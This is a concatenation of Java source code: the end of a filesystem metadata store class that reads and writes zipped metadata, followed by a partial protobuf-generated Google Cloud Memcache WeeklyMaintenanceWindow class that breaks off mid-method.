val compressedFile = getRealFileSystemPath(COMPRESSED_FILE); if (!fs.exists(compressedFile) || !fs.isFile(compressedFile)) { return getAllFile(rootPath); } log.info("reloadAll from metadata.zip"); MemoryMetaData data = MemoryMetaData.createEmpty(); getCompressedFiles().forEach((resPath, raw) -> data.put(raw.getMetaType(), new VersionedRawResource(raw))); return data; } private void compress(ZipOutputStream out, RawResource raw, String resPath) throws IOException { ZipEntry entry = new ZipEntry(resPath + JSON_SUFFIX); entry.setTime(raw.getTs()); out.putNextEntry(entry); compressHandlerInterface.write(out, raw); } public static Pair<MetadataType, String> splitFilePath(String resourcePath) { if ("/".equals(resourcePath)) { return new Pair<>(MetadataType.ALL, null); } else if (resourcePath.startsWith("/") && resourcePath.length() > 1) { resourcePath = resourcePath.substring(1); } String[] split = resourcePath.split("/", 2); if (split.length < 2) { throw new KylinRuntimeException("resourcePath is invalid: " + resourcePath); } String typeStr = split[0].toUpperCase(Locale.ROOT); return new Pair<>(MetadataType.create(typeStr), split[1]); } @VisibleForTesting protected Path getRealFileSystemPath(String resourcePath) { if (resourcePath.equals("/")) { return this.rootPath; } else if (resourcePath.endsWith(".zip")) { return new Path(this.rootPath, resourcePath); } else if (resourcePath.startsWith("/") && resourcePath.length() > 1) { resourcePath = resourcePath.substring(1); } return new Path(this.rootPath, resourcePath); } public static TreeSet<Path> getAllFilePath(Path filePath, FileSystem fs) { try { TreeSet<Path> fileList = Sets.newTreeSet(); Arrays.stream(fs.listStatus(filePath)).forEach(status -> getAllFilePath(status.getPath(), fs, fileList)); return fileList; } catch (Exception e) { Throwables.throwIfUnchecked(e); throw new KylinRuntimeException(e); } } MemoryMetaData getAllFile(Path filePath) { Date startTime = new Date(); MemoryMetaData data = MemoryMetaData.createEmpty(); // Extract duplicate code, load data to MemoryMetaData through FileStatus BiConsumer<FileStatus, MemoryMetaData> loadMetadataProcess = (innerStat, dataHelper) -> { RawResource innerRaw; try { innerRaw = loadOne(innerStat, filePath); if (innerRaw != null) { dataHelper.put(innerRaw.getMetaType(), new VersionedRawResource(innerRaw)); } } catch (IOException | InstantiationException | IllegalAccessException e) { Throwables.throwIfUnchecked(e); } }; try { FileStatus[] fileStatuses = fs.listStatus(filePath); log.info("getAllFile from {} started", filePath); List<Future<?>> futures = new ArrayList<>(); for (FileStatus childStatus : fileStatuses) { getAndPutAllFileRecursion(childStatus, fs, data, futures, loadMetadataProcess); } // wait for fileSystemMetadataExecutor to finish for (Future<?> future : futures) { Uninterruptibles.getUninterruptibly(future); } log.info("getAllFile cost {} ms", new Date().getTime() - startTime.getTime()); return data; } catch (Exception e) { Throwables.throwIfUnchecked(e); throw new KylinRuntimeException(e); } } private static void getAllFilePath(Path filePath, FileSystem fs, TreeSet<Path> fileList) { try { FileStatus[] files = fs.listStatus(filePath); for (FileStatus file : files) { if (file.isDirectory()) { getAllFilePath(file.getPath(), fs, fileList); } else { fileList.add(file.getPath()); } } } catch (IOException e) { Throwables.throwIfUnchecked(e); } } public void getAndPutAllFileRecursion(FileStatus status, FileSystem fs, MemoryMetaData data, List<Future<?>> futures, BiConsumer<FileStatus, MemoryMetaData> process) { try { for (FileStatus childStatus : fs.listStatus(status.getPath())) { if (childStatus.isDirectory()) { getAndPutAllFileRecursion(childStatus, fs, data, futures, process); } else { if (fileSystemMetadataExecutor != null) { futures.add(fileSystemMetadataExecutor.submit(() -> process.accept(childStatus, data))); } else { process.accept(childStatus, data); } } } } catch (IOException e) { Throwables.throwIfUnchecked(e); } } private List<String> getAllFilePathFromCompressedFiles() { return getCompressedFiles().keySet().stream().map(FileSystemMetadataStore::pathWithoutJsonSuffix) .collect(Collectors.toList()); } private void createMetaFolderIfNeed(Path metaDirName) { //create hdfs meta path try { if (!fs.exists(metaDirName)) { fs.mkdirs(metaDirName); } } catch (IOException e) { Throwables.throwIfUnchecked(e); } } @Getter(lazy = true) private final Map<String, RawResource> compressedFiles = getFilesFromCompressedFile(); private Map<String, RawResource> getFilesFromCompressedFile() { val compressedFile = getRealFileSystemPath(COMPRESSED_FILE); return getFilesFromCompressedFile(compressedFile, compressHandlerInterface, fs); } public static Map<String, RawResource> getFilesFromCompressedFile(Path compressedFile, CompressHandlerInterface handler, FileSystem fs) { try { if (fs == null || !fs.exists(compressedFile) || !fs.isFile(compressedFile)) { return Maps.newHashMap(); } } catch (IOException e) { log.warn("Check file failed. ", e); return Maps.newHashMap(); } try { return getFilesFromCompressedFileByStream(fs.open(compressedFile), handler); } catch (IOException e) { log.warn("Get file from compressed file error", e); return Maps.newHashMap(); } } public static Map<String, RawResource> getFilesFromCompressedFileByStream(InputStream stream, CompressHandlerInterface handler) { val res = Maps.<String, RawResource> newHashMap(); Preconditions.checkNotNull(handler, "compress handler should not be null!"); try (InputStream in = stream; ZipInputStream zipIn = new ZipInputStream(in)) { ZipEntry zipEntry; while ((zipEntry = zipIn.getNextEntry()) != null) { String path = zipEntry.getName(); if (path.startsWith("/")) { path = path.substring(1); } val raw = handler.read(zipIn, path, zipEntry.getTime(), splitFilePath(path).getKey()); if (raw != null) { res.put(path, raw); } } return res; } catch (Exception e) { log.warn("get file from compressed file error", e); } return Maps.newHashMap(); } private boolean compressedFilesContains(String path) { if (File.separator.equals(path)) { return !getCompressedFiles().isEmpty(); } return getCompressedFiles().keySet().stream() .anyMatch(file -> file.startsWith(path + "/") || file.equals(path)); } private static String pathWithoutJsonSuffix(String path) { if (path.endsWith(JSON_SUFFIX)) { path = path.substring(0, path.length() - JSON_SUFFIX.length()); } return path; } public interface CompressHandlerInterface { <T extends RawResource> T read(InputStream in, String resPath, long time, MetadataType type) throws IOException; void write(OutputStream out, RawResource raw) throws IOException; } @VisibleForTesting public static class CompressHandler implements CompressHandlerInterface { @Override @SuppressWarnings("unchecked") public <T extends RawResource> T read(InputStream in, String resPath, long time, MetadataType type) throws IOException { val raw = IOUtils.toByteArray(in); String name = resPath.substring(resPath.lastIndexOf("/") + 1); String metaKey = pathWithoutJsonSuffix(name); return (T) RawResource.constructResource(type, ByteSource.wrap(raw), time, 0, metaKey); } @Override public void write(OutputStream out, RawResource raw) throws IOException { try (InputStream inputStream = ByteSource.wrap(raw.getContent()).openStream()) { IOUtils.copy(inputStream, out); } } } public static class SnapShotCompressHandler implements CompressHandlerInterface { @Override @SuppressWarnings("unchecked") public <T extends RawResource> T read(InputStream in, String resPath, long time, MetadataType type) throws IOException { val snap = JsonUtil.readValue(IOUtils.toByteArray(in), SnapshotRawResource.class); String name = resPath.substring(resPath.lastIndexOf("/") + 1); return (T) RawResource.constructResource(type, snap.getByteSource(), snap.getTimestamp(), snap.getMvcc(), pathWithoutJsonSuffix(name)); } @Override public void write(OutputStream out, RawResource raw) throws IOException { val snapshotRawResource = new SnapshotRawResource(raw); out.write(JsonUtil.writeValueAsIndentBytes(snapshotRawResource)); } } }
googleapis/google-cloud-java
35,818
java-memcache/proto-google-cloud-memcache-v1/src/main/java/com/google/cloud/memcache/v1/WeeklyMaintenanceWindow.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/memcache/v1/cloud_memcache.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.memcache.v1; /** * * * <pre> * Time window specified for weekly operations. * </pre> * * Protobuf type {@code google.cloud.memcache.v1.WeeklyMaintenanceWindow} */ public final class WeeklyMaintenanceWindow extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.memcache.v1.WeeklyMaintenanceWindow) WeeklyMaintenanceWindowOrBuilder { private static final long serialVersionUID = 0L; // Use WeeklyMaintenanceWindow.newBuilder() to construct. private WeeklyMaintenanceWindow(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private WeeklyMaintenanceWindow() { day_ = 0; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new WeeklyMaintenanceWindow(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.memcache.v1.CloudMemcacheProto .internal_static_google_cloud_memcache_v1_WeeklyMaintenanceWindow_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.memcache.v1.CloudMemcacheProto .internal_static_google_cloud_memcache_v1_WeeklyMaintenanceWindow_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.memcache.v1.WeeklyMaintenanceWindow.class, com.google.cloud.memcache.v1.WeeklyMaintenanceWindow.Builder.class); } private int bitField0_; public static final int DAY_FIELD_NUMBER = 1; private int day_ = 0; /** * * * <pre> * Required. Allows to define schedule that runs specified day of the week. * </pre> * * <code>.google.type.DayOfWeek day = 1 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The enum numeric value on the wire for day. */ @java.lang.Override public int getDayValue() { return day_; } /** * * * <pre> * Required. Allows to define schedule that runs specified day of the week. * </pre> * * <code>.google.type.DayOfWeek day = 1 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The day. */ @java.lang.Override public com.google.type.DayOfWeek getDay() { com.google.type.DayOfWeek result = com.google.type.DayOfWeek.forNumber(day_); return result == null ? com.google.type.DayOfWeek.UNRECOGNIZED : result; } public static final int START_TIME_FIELD_NUMBER = 2; private com.google.type.TimeOfDay startTime_; /** * * * <pre> * Required. Start time of the window in UTC. * </pre> * * <code>.google.type.TimeOfDay start_time = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @return Whether the startTime field is set. */ @java.lang.Override public boolean hasStartTime() { return ((bitField0_ & 0x00000001) != 0); } /** * * * <pre> * Required. Start time of the window in UTC. * </pre> * * <code>.google.type.TimeOfDay start_time = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The startTime. */ @java.lang.Override public com.google.type.TimeOfDay getStartTime() { return startTime_ == null ? com.google.type.TimeOfDay.getDefaultInstance() : startTime_; } /** * * * <pre> * Required. Start time of the window in UTC. * </pre> * * <code>.google.type.TimeOfDay start_time = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ @java.lang.Override public com.google.type.TimeOfDayOrBuilder getStartTimeOrBuilder() { return startTime_ == null ? com.google.type.TimeOfDay.getDefaultInstance() : startTime_; } public static final int DURATION_FIELD_NUMBER = 3; private com.google.protobuf.Duration duration_; /** * * * <pre> * Required. Duration of the time window. * </pre> * * <code>.google.protobuf.Duration duration = 3 [(.google.api.field_behavior) = REQUIRED];</code> * * @return Whether the duration field is set. */ @java.lang.Override public boolean hasDuration() { return ((bitField0_ & 0x00000002) != 0); } /** * * * <pre> * Required. Duration of the time window. * </pre> * * <code>.google.protobuf.Duration duration = 3 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The duration. */ @java.lang.Override public com.google.protobuf.Duration getDuration() { return duration_ == null ? com.google.protobuf.Duration.getDefaultInstance() : duration_; } /** * * * <pre> * Required. Duration of the time window. * </pre> * * <code>.google.protobuf.Duration duration = 3 [(.google.api.field_behavior) = REQUIRED];</code> */ @java.lang.Override public com.google.protobuf.DurationOrBuilder getDurationOrBuilder() { return duration_ == null ? com.google.protobuf.Duration.getDefaultInstance() : duration_; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (day_ != com.google.type.DayOfWeek.DAY_OF_WEEK_UNSPECIFIED.getNumber()) { output.writeEnum(1, day_); } if (((bitField0_ & 0x00000001) != 0)) { output.writeMessage(2, getStartTime()); } if (((bitField0_ & 0x00000002) != 0)) { output.writeMessage(3, getDuration()); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (day_ != com.google.type.DayOfWeek.DAY_OF_WEEK_UNSPECIFIED.getNumber()) { size += com.google.protobuf.CodedOutputStream.computeEnumSize(1, day_); } if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(2, getStartTime()); } if (((bitField0_ & 0x00000002) != 0)) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(3, getDuration()); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.memcache.v1.WeeklyMaintenanceWindow)) { return super.equals(obj); } com.google.cloud.memcache.v1.WeeklyMaintenanceWindow other = (com.google.cloud.memcache.v1.WeeklyMaintenanceWindow) obj; if (day_ != other.day_) return false; if (hasStartTime() != other.hasStartTime()) return false; if (hasStartTime()) { if (!getStartTime().equals(other.getStartTime())) return false; } if (hasDuration() != other.hasDuration()) return false; if (hasDuration()) { if (!getDuration().equals(other.getDuration())) return false; } if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + DAY_FIELD_NUMBER; hash = (53 * hash) + day_; if (hasStartTime()) { hash = (37 * hash) + START_TIME_FIELD_NUMBER; hash = (53 * hash) + getStartTime().hashCode(); } if (hasDuration()) { hash = (37 * hash) + DURATION_FIELD_NUMBER; hash = (53 * hash) + getDuration().hashCode(); } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.memcache.v1.WeeklyMaintenanceWindow parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.memcache.v1.WeeklyMaintenanceWindow parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.memcache.v1.WeeklyMaintenanceWindow parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.memcache.v1.WeeklyMaintenanceWindow parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.memcache.v1.WeeklyMaintenanceWindow parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.memcache.v1.WeeklyMaintenanceWindow parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.memcache.v1.WeeklyMaintenanceWindow parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.memcache.v1.WeeklyMaintenanceWindow parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.memcache.v1.WeeklyMaintenanceWindow parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.memcache.v1.WeeklyMaintenanceWindow parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.memcache.v1.WeeklyMaintenanceWindow parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.memcache.v1.WeeklyMaintenanceWindow parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.cloud.memcache.v1.WeeklyMaintenanceWindow prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Time window specified for weekly operations. * </pre> * * Protobuf type {@code google.cloud.memcache.v1.WeeklyMaintenanceWindow} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.memcache.v1.WeeklyMaintenanceWindow) com.google.cloud.memcache.v1.WeeklyMaintenanceWindowOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.memcache.v1.CloudMemcacheProto .internal_static_google_cloud_memcache_v1_WeeklyMaintenanceWindow_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.memcache.v1.CloudMemcacheProto .internal_static_google_cloud_memcache_v1_WeeklyMaintenanceWindow_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.memcache.v1.WeeklyMaintenanceWindow.class, com.google.cloud.memcache.v1.WeeklyMaintenanceWindow.Builder.class); } // Construct using com.google.cloud.memcache.v1.WeeklyMaintenanceWindow.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) { getStartTimeFieldBuilder(); getDurationFieldBuilder(); } } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; day_ = 0; startTime_ = null; if (startTimeBuilder_ != null) { startTimeBuilder_.dispose(); startTimeBuilder_ = null; } duration_ = null; if (durationBuilder_ != null) { durationBuilder_.dispose(); durationBuilder_ = null; } return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.memcache.v1.CloudMemcacheProto .internal_static_google_cloud_memcache_v1_WeeklyMaintenanceWindow_descriptor; } @java.lang.Override public com.google.cloud.memcache.v1.WeeklyMaintenanceWindow getDefaultInstanceForType() { return com.google.cloud.memcache.v1.WeeklyMaintenanceWindow.getDefaultInstance(); } @java.lang.Override public com.google.cloud.memcache.v1.WeeklyMaintenanceWindow build() { com.google.cloud.memcache.v1.WeeklyMaintenanceWindow result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.memcache.v1.WeeklyMaintenanceWindow buildPartial() { com.google.cloud.memcache.v1.WeeklyMaintenanceWindow result = new com.google.cloud.memcache.v1.WeeklyMaintenanceWindow(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0(com.google.cloud.memcache.v1.WeeklyMaintenanceWindow result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.day_ = day_; } int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000002) != 0)) { result.startTime_ = startTimeBuilder_ == null ? startTime_ : startTimeBuilder_.build(); to_bitField0_ |= 0x00000001; } if (((from_bitField0_ & 0x00000004) != 0)) { result.duration_ = durationBuilder_ == null ? duration_ : durationBuilder_.build(); to_bitField0_ |= 0x00000002; } result.bitField0_ |= to_bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.memcache.v1.WeeklyMaintenanceWindow) { return mergeFrom((com.google.cloud.memcache.v1.WeeklyMaintenanceWindow) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.cloud.memcache.v1.WeeklyMaintenanceWindow other) { if (other == com.google.cloud.memcache.v1.WeeklyMaintenanceWindow.getDefaultInstance()) return this; if (other.day_ != 0) { setDayValue(other.getDayValue()); } if (other.hasStartTime()) { mergeStartTime(other.getStartTime()); } if (other.hasDuration()) { mergeDuration(other.getDuration()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 8: { day_ = input.readEnum(); bitField0_ |= 0x00000001; break; } // case 8 case 18: { input.readMessage(getStartTimeFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000002; break; } // case 18 case 26: { input.readMessage(getDurationFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000004; break; } // case 26 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private int day_ = 0; /** * * * <pre> * Required. Allows to define schedule that runs specified day of the week. * </pre> * * <code>.google.type.DayOfWeek day = 1 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The enum numeric value on the wire for day. */ @java.lang.Override public int getDayValue() { return day_; } /** * * * <pre> * Required. Allows to define schedule that runs specified day of the week. * </pre> * * <code>.google.type.DayOfWeek day = 1 [(.google.api.field_behavior) = REQUIRED];</code> * * @param value The enum numeric value on the wire for day to set. * @return This builder for chaining. */ public Builder setDayValue(int value) { day_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Required. Allows to define schedule that runs specified day of the week. * </pre> * * <code>.google.type.DayOfWeek day = 1 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The day. */ @java.lang.Override public com.google.type.DayOfWeek getDay() { com.google.type.DayOfWeek result = com.google.type.DayOfWeek.forNumber(day_); return result == null ? com.google.type.DayOfWeek.UNRECOGNIZED : result; } /** * * * <pre> * Required. Allows to define schedule that runs specified day of the week. * </pre> * * <code>.google.type.DayOfWeek day = 1 [(.google.api.field_behavior) = REQUIRED];</code> * * @param value The day to set. * @return This builder for chaining. */ public Builder setDay(com.google.type.DayOfWeek value) { if (value == null) { throw new NullPointerException(); } bitField0_ |= 0x00000001; day_ = value.getNumber(); onChanged(); return this; } /** * * * <pre> * Required. Allows to define schedule that runs specified day of the week. * </pre> * * <code>.google.type.DayOfWeek day = 1 [(.google.api.field_behavior) = REQUIRED];</code> * * @return This builder for chaining. */ public Builder clearDay() { bitField0_ = (bitField0_ & ~0x00000001); day_ = 0; onChanged(); return this; } private com.google.type.TimeOfDay startTime_; private com.google.protobuf.SingleFieldBuilderV3< com.google.type.TimeOfDay, com.google.type.TimeOfDay.Builder, com.google.type.TimeOfDayOrBuilder> startTimeBuilder_; /** * * * <pre> * Required. Start time of the window in UTC. * </pre> * * <code>.google.type.TimeOfDay start_time = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @return Whether the startTime field is set. */ public boolean hasStartTime() { return ((bitField0_ & 0x00000002) != 0); } /** * * * <pre> * Required. Start time of the window in UTC. * </pre> * * <code>.google.type.TimeOfDay start_time = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The startTime. */ public com.google.type.TimeOfDay getStartTime() { if (startTimeBuilder_ == null) { return startTime_ == null ? com.google.type.TimeOfDay.getDefaultInstance() : startTime_; } else { return startTimeBuilder_.getMessage(); } } /** * * * <pre> * Required. Start time of the window in UTC. * </pre> * * <code>.google.type.TimeOfDay start_time = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder setStartTime(com.google.type.TimeOfDay value) { if (startTimeBuilder_ == null) { if (value == null) { throw new NullPointerException(); } startTime_ = value; } else { startTimeBuilder_.setMessage(value); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Required. Start time of the window in UTC. * </pre> * * <code>.google.type.TimeOfDay start_time = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder setStartTime(com.google.type.TimeOfDay.Builder builderForValue) { if (startTimeBuilder_ == null) { startTime_ = builderForValue.build(); } else { startTimeBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Required. Start time of the window in UTC. * </pre> * * <code>.google.type.TimeOfDay start_time = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder mergeStartTime(com.google.type.TimeOfDay value) { if (startTimeBuilder_ == null) { if (((bitField0_ & 0x00000002) != 0) && startTime_ != null && startTime_ != com.google.type.TimeOfDay.getDefaultInstance()) { getStartTimeBuilder().mergeFrom(value); } else { startTime_ = value; } } else { startTimeBuilder_.mergeFrom(value); } if (startTime_ != null) { bitField0_ |= 0x00000002; onChanged(); } return this; } /** * * * <pre> * Required. Start time of the window in UTC. * </pre> * * <code>.google.type.TimeOfDay start_time = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder clearStartTime() { bitField0_ = (bitField0_ & ~0x00000002); startTime_ = null; if (startTimeBuilder_ != null) { startTimeBuilder_.dispose(); startTimeBuilder_ = null; } onChanged(); return this; } /** * * * <pre> * Required. Start time of the window in UTC. * </pre> * * <code>.google.type.TimeOfDay start_time = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public com.google.type.TimeOfDay.Builder getStartTimeBuilder() { bitField0_ |= 0x00000002; onChanged(); return getStartTimeFieldBuilder().getBuilder(); } /** * * * <pre> * Required. Start time of the window in UTC. * </pre> * * <code>.google.type.TimeOfDay start_time = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public com.google.type.TimeOfDayOrBuilder getStartTimeOrBuilder() { if (startTimeBuilder_ != null) { return startTimeBuilder_.getMessageOrBuilder(); } else { return startTime_ == null ? com.google.type.TimeOfDay.getDefaultInstance() : startTime_; } } /** * * * <pre> * Required. Start time of the window in UTC. * </pre> * * <code>.google.type.TimeOfDay start_time = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.type.TimeOfDay, com.google.type.TimeOfDay.Builder, com.google.type.TimeOfDayOrBuilder> getStartTimeFieldBuilder() { if (startTimeBuilder_ == null) { startTimeBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.type.TimeOfDay, com.google.type.TimeOfDay.Builder, com.google.type.TimeOfDayOrBuilder>( getStartTime(), getParentForChildren(), isClean()); startTime_ = null; } return startTimeBuilder_; } private com.google.protobuf.Duration duration_; private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.Duration, com.google.protobuf.Duration.Builder, com.google.protobuf.DurationOrBuilder> durationBuilder_; /** * * * <pre> * Required. Duration of the time window. * </pre> * * <code>.google.protobuf.Duration duration = 3 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return Whether the duration field is set. */ public boolean hasDuration() { return ((bitField0_ & 0x00000004) != 0); } /** * * * <pre> * Required. Duration of the time window. * </pre> * * <code>.google.protobuf.Duration duration = 3 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return The duration. */ public com.google.protobuf.Duration getDuration() { if (durationBuilder_ == null) { return duration_ == null ? com.google.protobuf.Duration.getDefaultInstance() : duration_; } else { return durationBuilder_.getMessage(); } } /** * * * <pre> * Required. Duration of the time window. * </pre> * * <code>.google.protobuf.Duration duration = 3 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder setDuration(com.google.protobuf.Duration value) { if (durationBuilder_ == null) { if (value == null) { throw new NullPointerException(); } duration_ = value; } else { durationBuilder_.setMessage(value); } bitField0_ |= 0x00000004; onChanged(); return this; } /** * * * <pre> * Required. Duration of the time window. * </pre> * * <code>.google.protobuf.Duration duration = 3 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder setDuration(com.google.protobuf.Duration.Builder builderForValue) { if (durationBuilder_ == null) { duration_ = builderForValue.build(); } else { durationBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000004; onChanged(); return this; } /** * * * <pre> * Required. Duration of the time window. * </pre> * * <code>.google.protobuf.Duration duration = 3 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder mergeDuration(com.google.protobuf.Duration value) { if (durationBuilder_ == null) { if (((bitField0_ & 0x00000004) != 0) && duration_ != null && duration_ != 